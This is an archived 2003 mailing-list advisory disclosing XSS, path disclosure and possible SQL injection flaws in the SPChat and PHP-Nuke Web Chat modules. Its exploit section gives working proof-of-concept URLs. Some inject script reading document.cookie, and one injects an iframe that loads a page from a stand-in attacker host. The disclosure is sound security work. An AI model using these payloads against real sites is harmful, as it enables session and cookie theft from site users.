[ PHP-Nuke :] Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0

From: Rynho Zeros Web (hackargentinoat_private)
Date: Sat May 31 2003 - 15:29:11 PDT

  • Next message: Matthew Murphy: "Mod_gzip Debug Mode Vulnerabilities" 

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
      Vendor URL: http://www.saarport.net
       Vuln Type: XSS (Cross Site Scripting), Path Disclosure, revealed of
DBUser Name, possible injection SQL
          Status: Vendor contacted, In a moment estara available the patched
version.
(http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
          Author: XyborG (http://www.rzw.com.ar)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro:
~~~~~~
SFChat & WebChat are very good and stable systems of chat online.  But it
has his faults :)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note:  The name of the WebChat module can change, I I will use that name.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:
~~~~~~~~~

Vendor has contacted and In a moment estara available the patched version.
To Fix the script temporarily, you must erase this script of your Web, or 
change its name so that nobody has access, but checks the Web of the creator

in search of the new patch, to be able to continue using this service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
~~~~~~~~

Web Chat 2.0 for PHP-Nuke:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure (see the source code):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules/WebChat/out.php

----- Source Code -----

<br />
<b>Warning</b>:  Access denied for user: 'victim@localhost' (Using password:
YES) in
<b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
</TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect
failed<BR>
<B>MySQL error</B>: 0 ()<BR>
Session halted.

----- Source Code -----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path
Disclosure:
~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclorure & revealed of DBUser Name & XSS, SQL Injection?
:
http://www.victim.com/modules/WebChat/in.php
http://www.victim.com/modules/WebChat/quit.php
http://www.victim.com/modules/WebChat/users.php
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SPChat Ver.
0.8.0:
~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>

----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----

(Note:  Replace '?'  by '<')

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- 
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

    This archive was generated by hypermail 2b30 : Mon Jun 02 2003 - 09:15:12 PDT